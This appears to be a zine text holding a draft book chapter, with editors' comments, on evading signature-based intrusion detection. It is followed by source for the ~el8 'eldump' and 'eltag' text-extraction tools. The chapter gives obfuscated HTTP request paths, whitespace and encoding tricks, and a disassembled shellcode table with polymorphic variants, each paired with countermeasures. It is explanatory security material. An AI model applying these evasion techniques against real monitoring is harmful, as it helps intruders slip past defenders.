Application developers are typically motivated by features and dollars. We all know that the end user is the ultimate decision maker on the success or failure of software. In an effort to please end users, provide maximum compatibility, and eliminate erroneous conditions, developers omit strict compliance with protocol specifications in favor of error correction. It is uncommon for an application to immediately terminate requests upon the first deviation from specified protocols; quite to the contrary, every effort is made to recover from any error in an attempt to service every request possible (thereby maximizing compatibility and possibly increasing interoperability). As security researcher Rain Forest Puppy (known as RFP) stated at the CanSecWest Security Conference 2001, "You would be surprised with what passes for legitimate http traffic."
RFP (CanSecWest Security Conference 2001). These practices are the downfall of application security; they only serve to aid an attacker by allowing additional latitude in which to operate.
That section could be read as either favoring strict compliance, or the opposite. Please re-word to make less ambiguous. Perhaps developers forego strict compliance
Also, RFP has a couple of chapters before this one, so you can assume the reader has heard of him by the time they get here.
Evading a Match
Upgrades, patches and variation of implementation may change the appearance (on the wire) of an application. Signatures that are too specific, too general, or just plain too stale are a basic issue that continues to thwart IDS attack identification efforts.
If we look back towards our snort signatures, we can see that quite clearly one of them specifies the complete path name for the chgrp command. This signature is supposed to alert to the execution of some command through a Web server. Any attacker who is aware of the semantics for these rules could easily modify their attack to play any number of tricks in hopes of evading this match.
This rule itself is quite specific about the path and name for the chgrp command. We can plainly see that if the command resided in a different directory than /usr/bin, this signature would fail. Also, if the attacker were to simply ensure that their path environment variable was correctly set, they may just issue chgrp, without the complete path, to evade a signature match. Should the IDS be configured to alert when any of these variations are present? How many signatures would our IDS have if we were to account for these many variations?
Alternate Data Encodings
Largely implemented to support multiple languages, the standard text sent between a web client and server may be encoded so that it should be interpreted as Unicode. Unicode gives the capability to represent any known symbol (the Unicode value for Yung is U+6C38). It also presents all new challenges to IDS vendors, as these values must be inspected and converted into ASCII for standard processing. This challenge is not that difficult to overcome; most systems implement a practice known as protocol normalization. Protocol normalization will take an input string and digest all known encodings, white space, and any protocol-specific delimiters in an attempt to produce the most basic form of the input.
Did you mean ASCII?
Yes
Unfortunately all of the normalizations imaginable cannot overcome the challenge of monitoring closed source software packages. Without detailed information of the inner workings of a system there can be no accounting for undocumented nonstandard features. IIS had one such special-feature: %u#### encoding was allowed as an alternate to the normal Unicode encodings (%####). The famed Code Red worm had used this previously unknown technique to bypass many IDS signatures tuned to match for the specific .ida buffer overflow vulnerability. Lack of information is the worst enemy of a network defender.
Consider the following imaginary attack:
Attack String:
GET /vulnerable.cgi?ATTACK=exploit-code
Signature:
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS 80 (msg:"WEB-ATTACKS vulnerable.cgi attempt"; flags:A+; content:"get /vulnerable.cgi?ATTACK=exploit-code";nocase; sid:1337; rev:1; classtype:web-application-attack;)
Modified Attack String:
GET /vulnerable.cgi?ATTACK=<SPACE>exploit-code
The attack here seems to exploit some Common Gateway Interface (CGI) application, and a simple signature is developed to alert to the known vulnerability. This signature would provide a very high level assurance that there would be relatively few false positives, as the exploit-code is embedded right into the signature. However, we can see that if the attacker were able to send a modified attack string, through the use of some additional white space, they should be able to bypass a signature match. This exercise again illustrates the difficulty of signature development. If the signature left out the portion of the exploit code, there may be a great number of false positives, whereas if they embed some of the exploit code, the chance for evasion is greatly increased.
This is an incredibly simplistic example and is not that difficult to overcome. Adequate normalizations should be able to eliminate white space and allow for a signature match.
Web Attack Techniques
A number of Web attack issues have been analyzed by RFP; see, for instance, "A look at whisker's anti-IDS tactics" from December 1999. He has implemented a number of them into his whisker vulnerability scanner. We'll take a look at some of them in the following sections.
Since RFP is working on this book he should probably take a look at this section. From past experience I like him to look at what people are writing about him. THX.
Ryan has sent the chapter to RFP.
Method Matching
The method of a HTTP request informs the server what type of connection to anticipate (GET, HEAD, POST, etc). RFP found that many IDS signatures had completely failed to recognize any other methods. This is a somewhat depressing fact as many IDS vendors claim to be not totally dependent on signature matching to generate an alert.
Directory and File Referencing
A slash, the character that specifies a separation between directory and file names (/), can be represented in a couple of different ways. The simplest form is double or multiple slashes (/some//file.html = /some////file.html). These tricks will fool the simplest signature matches, providing there are no normalizations to counteract.
Another form of the same trick (this works only on IIS Web servers), is to use the DOS slash character (\). If an IDS were not aware of this convention, it would not be able to generate a match.
These tricks work because they can reference a file by a different pathname. Amazingly enough, resolving a pathname is substantially harder than you would think (this is what has led to a number of remote compromises in IIS; remember Unicode). Dot, the path to the current directory, and double dot, the path to the previous directory, can be used to obfuscate a file reference. An attacker may only need to use his or her imagination in constructing unique paths; all of these are equivalent requests:
GET /some/file.cgi HTTP/1.0
GET /.././some////file.cgi HTTP/1.0
GET /./some//..\..///some/./file.cgi HTTP/1.0
A form of the aforementioned evasions is what RFP calls parameter hiding. This evasion is based on the assumption that some IDSs may only evaluate a request until they encounter a question mark (?, or its hex-encoded value %3f). This character is typically what will denote that any further parameters are arguments to a Web application. If the IDS simply wanted to alert to the request of a file, it may not fully evaluate the expression. The following two requests are equivalent:
GET /real.file HTTP/1.0
GET /%3f/file/does/not/exist/../../../../../real.file HTTP/1.0
Countermeasures
As discussed previously, a signature-based IDS may be able to normalize the communications stream. That is, as it inputs data destined for an HTTP server, it should apply some logic to reduce the input to its lowest common denominator (a single /, or resolved directory references). For this to help, the normalization has to mirror what the protected server itself does with the request; otherwise the sensor and the server still disagree about which file was asked for. Partial signature matches may also help: if a sensor does not enforce a strict 100% match, it should be able to account for some variation in many exploit types.
Using Code Morphing Evasion
Polymorphism is the ability to exist in multiple forms, and morphing is the process that is used to achieve polymorphism. The objective of polymorphic code is to retain the same functional properties while existing in a structurally unique form. A NIDS has only the opportunity to inspect information as it exists on the wire; this would then only allow the structure of the exploit to be inspected. This feature had allowed viruses to remain undetected for quite some time. The only difference is that a virus scanner has the opportunity to inspect disk files instead of network data. The way that most virus scanning engines have tackled this problem is through the use of heuristic scanning techniques; this is similar to what a host-based IDS would do (identifying suspicious events, inappropriate file access).
Polymorphism is achieved through taking the original attack payload and encoding it with some form of a reversible algorithm. All of the nop-sled instructions are substituted with suitable replacements. This encoded payload is then sent over the network with a small decoding function prefixed (this decoder is also dynamically generated to avoid a signature match). When the exploit runs on the target, the decoder will unwrap the original payload and execute it. This way, the original functionality is maintained.
nop-sled?
Yup, check out the buffer-overflow chapter.
Polymorphic shellcode is discussed thoroughly in this author's paper that was released in early 2001. An engine is included for use in any current or future vulnerabilities. The basis for polymorphic code generation is that there is always more than one way to calculate a value. If, to exploit a vulnerability, we had to calculate the value of 4, we could do any of 2+2, 3+1, 6-2 and so on. There are literally endless methods to calculate a given value; this is the job of an exploit, the processing of some machine instructions. To a NIDS examining network traffic there is no way to identify 2+2 being equivalent to 3+1. The NIDS is only given the low-level machine instructions to evaluate against a known pattern; it does not interpret the instructions as the target host will.
This technique has the ability to mask any exploit from detection, from any specific rule to the general. The only opportunity for a signature based NIDS to formulate a match is if a signature for the small decoder is able to be determined. To date I have not seen any signatures or techniques developed for this class of polymorphic shellcode.
Table 16.1 shows a side by side view of two executions of a polymorphic shellcode engine.
What should alignment of multiple items within table columns be?
Table 16.1 Shellcode Variations
Addresses
Normal Shellcode
Possible Polymorphic shellcode #1
Possible Polymorphic shellcode #2
0x8049b00
0x8049b01
0x8049b02
0x8049b03
0x8049b04
0x8049b05
0x8049b06
0x8049b07
0x8049b08
0x8049b09
0x8049b0a
0x8049b0b
0x8049b0c
0x8049b0d
0x8049b0e
0x8049b0f
0x8049b10
0x8049b11
0x8049b12
0x8049b13
0x8049b14
0x8049b16
0x8049b17
0x8049b19
0x8049b1b
0x8049b1e
0x8049b20
0x8049b21
0x8049b23
0x8049b25
0x8049b26
0x8049b28
0x8049b2a
0x8049b2b
0x8049b2d
0x8049b2f
0x8049b31
0x8049b33
0x8049b35
0x8049b36
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
jmp 0x8049b38
pop %esi
mov %esi,%ebx
mov %esi,%edi
add $0x7,%edi
xor %eax,%eax
stos %al,%es:(%edi)
mov %edi,%ecx
mov %esi,%eax
stos %eax,%es:(%edi)
mov %edi,%edx
xor %eax,%eax
stos %eax,%es:(%edi)
mov $0x8,%al
add $0x3,%al
int $0x80
xor %ebx,%ebx
mov %ebx,%eax
inc %eax
int $0x80
push %ebx
cmc
pop %edx
xchg %eax,%edx
lahf
aas
push %esi
push %esp
clc
push %edx
push %esi
xchg %eax,%ebx
dec %ebp
pop %ecx
inc %edi
dec %edi
inc %ecx
sahf
pop %edi
sti
push %esp
repz dec %eax
push %ebp
dec %esp
pop %eax
loope 0x804da1b
js 0x804d994
daa
sbb $0x15,%al
pop %eax
out %eax,(%dx)
push %ebp
dec %edi
jp 0x804d966
movl %es:(%ecx),%ss
mov $0x15d5b76c,%ebp
adc %edi,(%edi)
loopne 0x804d9a0
push %ebp
xchg %eax,%ecx
das
pushf
inc %ecx
xchg %eax,%ebp
pop %edi
push %edi
dec %ebp
dec %ebx
lahf
xchg %eax,%edx
push %ebx
pushf
inc %esp
fwait
lahf
pop %edi
dec %ecx
dec %eax
cwtl
dec %esp
xchg %eax,%ebx
sarb $0x45,(%ecx)
mov 0xffffff90(%ebx),%ebp
dec %edi
mov $0xd20c56e5,%edi
imul $0x36,0xee498845(%esi),%ebx
dec %ecx
and %ah,%cl
jl 0x804da3d
out %al,$0x64
add %edi,%eax
sarl %cl,0x4caaa2a0(%ebp,%eax,2)
nop
cmp 0x5cd8733(%eax),%ebx
movsl %ds:(%esi),%es:(%edi)
push %ss
int $0x14
push $0xbffff586
xchg %dh,%ch
(bad)
As you can plainly see, there is very little correlation between the three executions. There are a huge number of permutations that can be used.
Unfinished thought?
Whats the (bad) there?
That is part of the encoded shellcode, its value did not decode by gdb as a valid instruction so it just pops up as (bad).
Countermeasure
It is apparent that most IDSs are not always quite ready to run out of the box. They require frequent updating and maintenance to yield long-term success. The IDSs that do have hope of detecting unknown forms of attack are anomaly-detection based. These systems do not use signatures at all. They instead monitor all network communications as they occur and attempt to build a high-level image of typical traffic. A statistical anomaly would then trigger an alert. As the system matures and gains more entropy into its database, it would then theoretically become more accurate. There is some question whether or not a purely anomaly-based detection engine would be very effective, as exploit attempts seem to be quite normal in day-to-day network operation and may fall into the baseline of these systems. As in all things, a little of each is not a bad idea. A strong signature-based system supplemented by an anomaly-based detection engine should yield a high level of assurance that most intrusion events are monitored.
In the endless security game of cat and mouse, one can forecast the generation of polymorphic statistically normalized attack engines that should provide one more hurdle for NIDS developers to overcome.
Summary
Signature-based IDS sensors have many variables to account for when attempting to analyze and interpret network data. Many challenges continue to elude these systems. The lack of information that is available for inspection is difficult to overcome. However, the rate at which many IDS sensors have been maturing is quite promising; Gigabit speeds and flexible architectures supported by an ever-growing security community push forward to configure systems that are capable of detecting all but the most obtuse and infrequent attack scenarios.
At every layer of the network stack there are difficulties with maintaining a consistent view of network traffic and the effect of every packet being transmitted. It is quite clear that an attacker has certain advantages, being able to hide in a sea of information while being the only one aware of their true intention.
Packet layer evasions have been well documented throughout the past several years. IDS vendors are quite aware of the many issues surrounding packet acquisition and analysis. Most networks are beginning to filter suspicious packets in any case, that is any types with options and excessive fragmentations. Perhaps in the coming years network layer normalizations will become commonplace and many of these evasion possibilities will evaporate.
The difficulty with analyzing the application layer protocols continues to cause ongoing headaches. Some proxy solutions have begun to take hold but the bottleneck that these systems cause is often too great. They also suffer from similar issues as IDSs, unable to identify classes of attacks that they were not originally intended for.
It is quite acceptable to quash malformed TCP/IP packets in the case of an error; a legitimate end system would simply retransmit. The same is not true for higher layers; a NIDS may have an extremely limited understanding of application protocols and the information they transmit. Polymorphic attacks present a significant challenge that cannot be easily solved with a purely signature-based system. These attacks may exist in virtually limitless combinations.
Fix grammar
IDS evasion will continue to be a way of life on the Internet. There is an ever-renewing tide of tools and techniques designed for large-scale implementation (eventually raising the everyday script kiddie into a more advanced skill set) to make the job of detection more difficult. One should continually monitor and investigate network activity to gain an understanding of what to expect in day-to-day operations, and hold dear the principles of least privilege, segmentation and auditing to ensure that the overall network posture remains as secure as possible.
Clarify?
Solutions Fast Track
Author: Please fortify these bullet points so they are all full sentences. They should also be a bit more informative and useful to the reader who wants to use them to brush up on the chapter materialyou could add a sentence to each that makes it clearer why that particular point is relevant to the chapter.
Understanding How Signature-Based IDSs Work
The capabilities of a NIDS are defined by a signature database. This enforces the requirement for frequent updates to combat the frequency of new vulnerabilities.
Most NIDS do not alert even to slight variations of the defined signatures. This affords an attacker the ability to vary their attack to evade a signature match.
Signatures are very specific to a vulnerability slight variations will be missed
Attackers will continue to vary their evasion techniques such that the processing required to monitor and detect is greatly increased. This would contribute to DoS and evasion possibilities.
Using Packet Level Evasion
Many vendors implement TCP/IP with slight variations. A NIDS has a difficult time in constructing a view of network communications as they appear to other systems. This inconsistent view is what allows an attacker to evade detection.
Hosts may not adhere to RFC specifications and may allow some packets where the NIDS may not.
NIDS do not have enough information from the wire to reconstruct TCP/IP communications. With the options and states available in a TCP/IP stack, some ambiguities form as to how a host would interpret information; there is an insufficiency of information transmitted between systems when communicating.
Fragrouter and congestant are effective evasion tools. They implement a number of documented NIDS evasion techniques.
Using Protocol and Application Protocol Level Evasion
Application protocols are verbose and rich in function. There are many subtle, antiquated and obscure application nuances that make effective application protocol decoding difficult. An attacker may compromise even the slightest oversight.
Applications tend to allow for slight variation; developers intentionally build in error-correcting cases that attempt to make sense of any request, no matter how malformed. With a lack of strict compliance to defined specifications, it is difficult for the NIDS to determine the behavior of a network application.
Multiple encoding options exist for data representation, Unicode, uuencoded or hex encoded options exist in many application protocols. These alternate representations complicate the development of detection engines.
Using Code Morphing Evasion
There is always more than one way to do it. When detection hinges on the identification of application code, there are many alternatives to code generation.
The code of an attack may be pseudo-randomly generated. Any number of instructions can accomplish similar tasks; the code must simply function, and there is no requirement of performance or other optimization benefits.
Most exploits will vary from host to host. Variations can be incorporated even when restrictions are placed on the length or type of codes possible.
Frequently Asked Questions
Q: How many IDSs do I need to make them more effective?
A: All networks are different and require varying levels of monitoring. Your particular risk tolerance should help you find this out, though. A network which desires a high level of assurance that it is detecting many intrusion events should have at least one sensor per network segment (layer 2). It is also desirable to have multiple vendor types implemented when an even higher level of security is needed (one vendor's strengths would hopefully fill in gaps from another).
Q: Arent these techniques too advanced for most attackers?
A: Just like most other technologies, attack methodologies and techniques are eventually turned into boilerplate applications that anybody can wield. The layout of the virtual battlefield may change in an instant. The next big worm might wield these techniques, and force a sea-change in the IDS market.
Q: How do I choose the best IDS?
A: Continue to do as much research as possible. The biggest tool that a network architect has is that only they are aware of all the tricks that are deployed on the enterprise. Be creative, use multiple vendors technologies, and implement honeypots for advanced warning of unknown techniques and vulnerabilities. Homegrown technologies (if properly tested and implemented) often do a great service when a high degree of security is required.
Q: Where can I get information about new evasion attacks?
A: The underground scene is typically the catalyst for advancements in security technologies. Frequent online publications to get a feel for where useful information may come from. There is no single source for where all new papers will be distributed.
Check out:
antisec (http://anti.security.is)
Phrack (http://)
Packetstorm ()
Technotronic (http://www.technotronic.com/)
Drop a couple of names, if you would if you like Phrack, some mailing list, etc please mention here.
Q: What do I do if I am inundated with alerts?
A: Secure systems rely on compartmentalization to hopefully contain intruders. If you see that you are being attacked at an abnormal pace, isolate and separate the troubled systems and attempt to identify if there are some hosts with some well-known vulnerabilities or exposures. Correlate your logs and IDS events to give you a better picture of what may be going on. Do not rely on authorities and the network administrators of the attacking networks; they are usually far too overworked or uninterested to give a respectable amount of support.
Q: How do I know that my IDSs are working?
A: Ongoing auditing and testing should be done to ensure that networking systems are properly implemented. Independent reviewers should always be a part of secure systems to ensure a fresh set of eyes evaluates a network architecture and IDS implementation.
[END_CUT] ch16
[END_DIR] articles
.~e~----------------------------------------------------------~e~.
; *16* ELDUMP & ELTAG ~el8 ez1ne t00lz -- s1rsyko ;
`----------------------------------------------------------------'
[BEGIN_DIR] .
[CUT_HERE] eldump.c
/*
-+-+
cat <<'/*++--++*'> eldump.c # */
/**********************************************
* released under (E) licensing ... *
* (E) RULES AND REGULATIONS *
**********************************************/
/*******************************************
* eldump.c for standard UNIX compilers *
* next version: *
* *
* +article extraction (ablility to *(E)*
* specify article number) *[~]*
* +code extract by article number *[E]*
* +GUI interface for file viewing *[L]*
* (most likely curses based) *[8]*
* +ability to update code/articles via *[`]*
* updates/correction posted *[9]*
* on ~el8 website *[9]*
* +much cooler/faster/stronger/portable *
* +Versions for DOS C/COBOL/Asm/Pascal *
*******************************************/
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
/**************************************
* next version of eldump will have *
* a lot more features, this is just *
* a basic code extraction version. *
* - team ~el8 *
* *
* #define ISH_START "[SOI] %s" *
* #define ARTICLE_START "[BOW] %s" *
* #define ARTICLE_END "[EOW]" *
* #define ISH_END "[EOI]" *
**************************************/
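/*
 * Verbosity levels.  main() stores one of these (or a sum of them) in the
 * global `verbose`, and the rest of the file only ever tests it with `>=`,
 * so what matters is the ordering VERBOSE < VERY < LOTS.
 */
#define VERBOSE 0x01
#define VERY 0x10
#define LOTS 0x20
/* char array sizes */
#define LINELEN 80              /* one line of issue text, NUL included */
#define BUFLEN 255              /* path buffers */
/*
 * Issue tag formats.  Each one is used as an sscanf() pattern against a
 * single line of the issue text, and the matching *_ARGS value is the
 * number of conversions a successful scan must report.
 *
 * The issue text is untrusted input, so every %s carries an explicit field
 * width of LINELEN - 1: the scan can then never write more than LINELEN
 * bytes into its destination, independently of how long the scanned line
 * happens to be.  Keep the width in step with LINELEN.
 */
#define CODE_START "[CUT_HERE] %79s"
#define CODE_START_ARGS 1
#define DIR_START "[BEGIN_DIR] %79s"
#define DIR_START_ARGS 1
#define DIR_END "[END_DIR] %79s"
#define DIR_END_ARGS 1
#define CODE_END "[END_CUT] %79s"
#define CODE_END_ARGS 1
/* loop(n): repeat the following statement while n is true */
#define loop(n) for(;n;)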
/* global vars -- shared by main(), extr() and code() */

/* issue file currently being read; opened in extr(), also read by code() */
FILE *TextFD;

/* working directory at start-up, filled in by getcwd() in main() */
char BaseDirectory[BUFLEN];
/* line buffer used by extr() */
char buf[LINELEN];
/* BaseDirectory "/" <name from the most recent [BEGIN_DIR] tag> */
char CodeDir[BUFLEN + BUFLEN];
/* scratch space for the name on an [END_DIR] or [END_CUT] tag */
char tmp[LINELEN];

/* verbosity level selected on the command line */
int verbose = 0;
/* counters printed by main(); only incremented when verbose >= VERBOSE */
int linez = 0;
int codez = 0;
int dirz = 0;

/* header written by code() at the top of every extracted file whose name
   ends in ".c" */
const char *license =
  "/***********************************************\n"
  " * released under (E) licensing ... *\n"
  " ***********************************************/\n"
  "/* contact ahuger@securityfocus.com for full license */\n"
  "/* code copyrighted by ~el8 -- don't infringe! */\n\n";

/**********************
* int article(char *);
* int issue(char *);
**********************/

/* function prototypes */
int code (char *);              /* write one [CUT_HERE] section to a file */
int extr (char *);              /* walk one issue file and act on its tags */
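/*
 * eldump entry point: run extr() on every issue file named on the command
 * line.
 *
 * Usage: eldump file1 [file2 ...] [-v | -vv | -vvv]
 *
 * Only the LAST argument is examined for a verbosity option.  With no
 * arguments the usage banner is printed and the program exits with -1; the
 * same status is used when only an option and no file was given.
 *
 * The exit status is 0 once the file loop has run, even if extr() failed
 * for some file; per-file results are only reported at -vvv.
 */
int
main (int argc, char *argv[])
{
  int NumberOfFiles;            // index of the file being processed

  /* Every extraction path is built by prefixing BaseDirectory.  If the
     working directory cannot be determined, stop here instead of building
     paths from an empty prefix (which would make them root-relative). */
  if (getcwd (BaseDirectory, BUFLEN) == NULL)
    {
      perror ("getcwd");
      exit (-1);
    }
  setvbuf (stderr, (char *) NULL, _IONBF, 0);
  if (argc < 2)                 // no options specified
    {
      fprintf (stderr,
               "\033[0;36m"
               ".---------------------------------------.\n"
               "|\033[1;36m /\\/| _ ___ _ \033[0;36m |\n"
               "|\033[1;36m |/\\/ ___| |( _ ) _____ _| |_ _ __ \033[0;36m|\n"
               "|\033[1;36m / _ \\ |/ _ \\ / _ \\ \\/ / __| '__| \033[0;36m|\n"
               "|\033[1;36m | __/ | (_) || __/> <| |_| | \033[0;36m|\n"
               "|\033[1;36m \\___|_|\\___/ \\___/_/\\_\\\\__|_| \033[0;36m|\n"
               "`---usage-------------------------------'\n"
               "\033[m\n"
               "\033[7m %s [file1 file2 file3 ...] <option>\t\033[m\n"
               "\033[0;32m\n"
               ".---options-----------------------------.\n"
               "|+\033[1;32m [-v]: verbose \033[0;32m |\n"
               "|+\033[1;32m [-vv]: very verbose\033[0;32m |\n"
               "|+\033[1;32m [-vvv]: very very verbose \033[0;32m |\n"
               "`---------------------------------------'\n"
               "\033[m",
               argv[0]);
      exit (-1);
    }
  verbose = 0;
  /* The longer options are tested first and compared exactly.  The earlier
     code tested the two-character prefix "-v" first, which also matched
     "-vv" and "-vvv", so the two higher levels could never be selected.
     The prefix test is kept last so that anything starting with "-v" is
     still consumed as plain verbose, as before. */
  if (!strcmp (argv[argc - 1], "-vvv"))
    {
      verbose = (LOTS + VERBOSE + LOTS);
      argc--;
    }
  else if (!strcmp (argv[argc - 1], "-vv"))
    {
      verbose = (VERY + VERBOSE);
      argc--;
    }
  else if (!strncmp (argv[argc - 1], "-v", 2))
    {
      verbose = VERBOSE;
      argc--;
    }
  if (argc < 2)
    {
      fprintf (stderr, "need files...\n");
      exit (-1);
    }
  for (NumberOfFiles = 1; NumberOfFiles < argc; NumberOfFiles++)
    {
      int rc;

      if (verbose >= LOTS)
        fprintf (stderr, "eldumping code from %s\n", argv[NumberOfFiles]);
      rc = extr (argv[NumberOfFiles]);
      if (verbose >= LOTS)
        fprintf (stderr, "[#%i] code eldump of %s: %s\n",
                 NumberOfFiles, argv[NumberOfFiles],
                 (rc == 0) ? "success!" : "failed.");
    }
  if (verbose >= VERBOSE)
    {
      /* the counters are only maintained when verbose >= VERBOSE */
      fprintf (stderr, "\t%i texts\n\t%i dirs\n\t%i codes\n\t%i lines\n",
               NumberOfFiles - 1, dirz, codez, linez);
    }
  exit (0);
}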
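/*
 * Return 1 when `name`, taken from a tag in the issue text, is acceptable
 * as a file or directory name below the extraction directory: it must be
 * non-empty, relative, and free of ".." path components.
 *
 * The issue text is untrusted input.  Without this check a tag could name
 * a path outside the directory eldump was started in, and extraction would
 * create directories or truncate files there.  The check is lexical only;
 * it does not resolve symbolic links that already exist on disk.
 */
static int
name_is_contained (const char *name)
{
  const char *p = name;

  if (*p == '\0' || *p == '/')
    return 0;
  while (*p != '\0')
    {
      size_t n = strcspn (p, "/");

      if (n == 2 && p[0] == '.' && p[1] == '.')
        return 0;
      p += n;
      while (*p == '/')
        p++;
    }
  return 1;
}

/*
 * Walk one issue file line by line and act on its tags:
 *   [BEGIN_DIR] name - create BaseDirectory/name (mode 0700) and chdir there
 *   [CUT_HERE] name  - hand the following lines to code(), which writes
 *                      them to a file called name
 *   [END_DIR] name   - chdir back up one level (or stay put for ".")
 *
 * TextFileName: path of the issue file to read.
 * Returns 0 on success, -1 if the file cannot be opened, a tag carries an
 * unsafe name, a directory cannot be created or entered, or code() fails.
 */
int
extr (char *TextFileName)
{
  char arg[LINELEN] = "";

  if ((TextFD = fopen (TextFileName, "r")) == NULL)
    {
      fprintf (stderr, "opening text %s: %s\n", TextFileName,
               strerror (errno));
      return (-1);
    }
  /* Loop on the result of fgets() itself.  Testing feof() before the read
     let the final iteration run on a stale buffer, so the last line of the
     file was processed a second time. */
  while (fgets (buf, LINELEN, TextFD) != NULL)
    {
      if (sscanf (buf, DIR_START, arg) == DIR_START_ARGS)
        {
          if (!name_is_contained (arg))
            {
              fprintf (stderr, "refusing unsafe directory name %s\n", arg);
              fclose (TextFD);
              return (-1);
            }
          snprintf (CodeDir, sizeof CodeDir, "%s/%s", BaseDirectory, arg);
          if (verbose >= VERBOSE)
            {
              fprintf (stderr, "creating %s/\n", CodeDir);
              dirz++;
            }
          /* an already existing directory is fine */
          if ((mkdir (CodeDir, 0700) == -1) && (errno != EEXIST))
            {
              perror (CodeDir);
              fclose (TextFD);
              return (-1);
            }
          if (chdir (CodeDir) == -1)
            {
              fprintf (stderr, "changing to code dir %s: %s\n", CodeDir,
                       strerror (errno));
              fclose (TextFD);
              return (-1);
            }
          else if (verbose >= LOTS)
            fprintf (stderr, "changing to %s\n", CodeDir);
        }
      else if (sscanf (buf, CODE_START, arg) == CODE_START_ARGS)
        {
          /* code() opens this name for writing and truncates it, so it is
             checked before anything is created */
          if (!name_is_contained (arg))
            {
              fprintf (stderr, "refusing unsafe file name %s\n", arg);
              fclose (TextFD);
              return (-1);
            }
          if (verbose >= VERY)
            fprintf (stderr, "eldumping %s\n", arg);
          if (code (arg) == -1)
            {
              fclose (TextFD);
              return (-1);
            }
        }
      else if (sscanf (buf, DIR_END, tmp) == DIR_END_ARGS)
        {
          if (verbose >= LOTS)
            fprintf (stderr, "changing to ..\n");
          /* Compare the name that was just scanned from the [END_DIR] tag.
             The earlier code compared `arg`, which at this point still
             holds the name from the previous [BEGIN_DIR] or [CUT_HERE] tag
             (or nothing at all), so "[END_DIR] ." could step out of the
             base directory. */
          if (chdir ((!strcmp (tmp, ".")) ? "." : "..") == -1)
            perror ("chdir");
        }
    }
  fclose (TextFD);
  return (0);
}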
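/*
 * Copy one code section of the issue into a file.
 *
 * Lines are read from the already open global TextFD and written to
 * CodeFileName until a line matching the [END_CUT] tag, or the end of the
 * issue file, is reached.  Files whose name ends in ".c" get the `license`
 * header written first.
 *
 * CodeFileName comes straight from a [CUT_HERE] tag in the issue text and
 * is opened with "w+", which truncates an existing file.  This function
 * does not check the name, so any restriction to the extraction directory
 * has to be enforced by the caller.
 *
 * Returns 0 on success, -1 if the code directory cannot be entered or the
 * output file cannot be opened or completely written.
 */
int
code (char *CodeFileName)
{
  FILE *CodeFile;
  char codebuff[BUFLEN];
  size_t namelen = strlen (CodeFileName);

  /* CodeDir stays empty until the first [BEGIN_DIR] tag has been seen; in
     that case the file goes into the current directory.  A failed chdir is
     reported instead of silently writing the file somewhere else. */
  if (CodeDir[0] != '\0' && chdir (CodeDir) == -1)
    {
      fprintf (stderr, "changing to code dir %s: %s\n", CodeDir,
               strerror (errno));
      return (-1);
    }
  if ((CodeFile = fopen (CodeFileName, "w+")) == NULL)
    {
      fprintf (stderr, "opening code %s: %s\n", CodeFileName,
               strerror (errno));
      return (-1);
    }
  if (verbose >= VERBOSE)
    codez++;
  /* the length check keeps a one-character name from indexing before the
     start of the string */
  if (namelen >= 2 && CodeFileName[namelen - 2] == '.'
      && CodeFileName[namelen - 1] == 'c')
    fputs (license, CodeFile);
  /* Loop on fgets() itself: testing feof() first wrote the last line twice
     (or an uninitialised buffer for an empty section) when the issue ended
     without an [END_CUT] tag. */
  while (fgets (codebuff, LINELEN, TextFD) != NULL)
    {
      if (sscanf (codebuff, CODE_END, tmp) == CODE_END_ARGS)
        {
          if (verbose >= LOTS)
            fprintf (stderr, "end of %s\n", CodeFileName);
          break;
        }
      fputs (codebuff, CodeFile);
      if (verbose >= VERBOSE)
        linez++;
    }
  /* close on every path (the end-of-file path used to leak the handle) and
     surface write errors that only show up when the stream is flushed */
  if (fclose (CodeFile) == EOF)
    {
      perror (CodeFileName);
      return (-1);
    }
  return 0;
}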
// [CUT_HERE] <NAME> then [END_CUT] <NAME> //
// [BEGIN_DIR] <NAME> then [END_DIR] <NAME> //
/*++--++*
cat <<'[EOI]'> /dev/null
*/
[END_CUT] eldump.c
[CUT_HERE] eltag.c
#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
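/* loop(n): repeat the following statement while n is true */
#define loop(n) for(;n;)
/* sscanf() pattern for an article tag: a number and a name, "[(N) name]" */
char *TAG="[(%i) %s]";
//char *TOCTAG="~el8|*iSSue2*[(%u) %s]*iSSue2|~el8";
/*
 * Pattern selected by -t.  As shipped it contains no conversions, so the
 * "sscanf(...) == 2" test in t4gz() can never succeed with it.
 * NOTE(review): the commented-out definition above looks like the intended
 * format -- confirm before relying on -t.
 * (The terminating semicolon was missing, which stopped the file compiling.)
 */
char *TOCTAG=";;;;;;;;;;;;";
extern char *optarg;            /* set by getopt() in main() */
FILE *out;                      /* stream opened by -o; NULL until then */
void t4gz(char *,char*,int);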
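/*
 * eltag entry point: parse the options and hand the input file to t4gz().
 *
 *   -i / -X / -O / -x  number format passed on to t4gz()
 *   -t                 scan with TOCTAG instead of TAG
 *   -f infile          file to scan
 *   -o outfile         file opened for writing and stored in `out`
 *
 * Exits with -1 on a usage error, an unknown option, a missing input file
 * or an output file that cannot be opened.
 *
 * NOTE(review): getopt() is declared in <unistd.h>, which is not among the
 * headers this file includes; only optarg is declared by hand.
 */
int
main (int argc, char *argv[])
{
  int p;
  char *file = NULL;            /* stays NULL when -f is not given */
  int type = 0;                 /* 0 selects t4gz()'s default format */
  char *t4g = TAG;

  if (argc < 3)
    {
      fprintf (stderr, "usage: %s <format> <-t> [-f infile] <-o outfile>\n"
               "formats:\n"
               "\t[-i]: integer output\n"
               "\t[-X]: uppercase hexidecimal output\n"
               "\t[-O]: octal output\n"
               "\t[-x]: lowercase hexadecimal\n"
               "[-t] = output table of contents\n",argv[0]);
      exit (-1);
    }
  while ((p = getopt (argc, argv, "tiXOxf:o:")) != -1)
    {
      switch (p)
        {
        case 't':
          t4g = TOCTAG;
          break;
        case 'i':
        case 'X':
        case 'O':
        case 'x':
          /* the option letter itself is the format selector */
          type = p;
          break;
        case 'f':
          file = optarg;
          break;
        case 'o':
          if ((out = fopen (optarg, "w+")) == NULL)
            {
              perror (optarg);
              exit (-1);
            }
          break;
        default:
          exit (-1);
        }
    }
  /* `file` and `type` used to be passed on uninitialised when -f or the
     format option was left out; refuse to continue without an input file */
  if (file == NULL)
    {
      fprintf (stderr, "%s: no input file given (-f infile)\n", argv[0]);
      exit (-1);
    }
  if (out == NULL)
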